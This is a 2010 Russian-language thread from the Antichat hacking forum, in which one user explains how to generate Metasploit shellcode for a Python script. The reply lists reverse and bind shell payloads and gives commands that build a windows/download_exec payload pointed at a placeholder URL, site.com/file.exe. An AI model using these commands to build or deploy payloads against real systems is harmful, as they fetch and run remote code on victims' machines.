ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Где взять взять шеллкоды для метасплойта???
  #1  
Старый 28.04.2010, 11:18
Аватар для Glynec
Glynec
Участник форума
Регистрация: 30.01.2008
Сообщений: 113
Провел на форуме:
601349

Репутация: 47
По умолчанию Где взять взять шеллкоды для метасплойта???

Нужно наваять шелкод на ПИТОНЕ ..http://metasploit.com:55555/PAYLOADS неработает почемуто(((((
 
Ответить с цитированием

  #2  
Старый 28.04.2010, 12:20
Аватар для overxor
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

Устанаваливаешь metasploit (думаю не надо описывать как это делать)

Запускаешь
Цитата:
$ msfconsole
msf > show payloads # Просматриваешь все шелкоды
Payloads
========

Name Rank Description
---- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline


windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > info windows/download_exec # Просматриваешь информацию о шелкоде
...
msf> use windows/download_exec # выбираешь понравившийся тебе шелкод
msf payload(download_exec) > set URL http://site.com/file.exe # устанавливаешь параметры шелкода
msf payload(download_exec) > generate -t ruby # генерируешь шелкод под ruby синтаксис(т.к. для питоновского нет, но ruby похож на него)
ну или все перечисленное можно сделать в одну команду
Цитата:
msfpayload windows/download_exec URL=http://site.com/file.exe ruby
теперь убери в каждой строке "+", а в начало поставь "buf +="
 
Ответить с цитированием

  #3  
Старый 28.04.2010, 12:32
Аватар для Glynec
Glynec
Участник форума
Регистрация: 30.01.2008
Сообщений: 113
Провел на форуме:
601349

Репутация: 47
По умолчанию

Ммм оч интересн overxor неподскажешь шелл на руби будет пахать в питоновском скрипте? Просто я помню что на http://metasploit.com:55555/PAYLOADS была прямо вкладка Руби
 
Ответить с цитированием

  #4  
Старый 28.04.2010, 12:40
Аватар для overxor
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию

Шел не на руби, он подготовлен для использование в руби(Тобишь ctrl+c ctrl+v). Что тебе мешает эту строку присвоить переменной в питоне и использовать ее?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Наши статьи, FAQи, обзоры, релизы. оlbaneс Социальные сети 11 01.05.2010 16:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ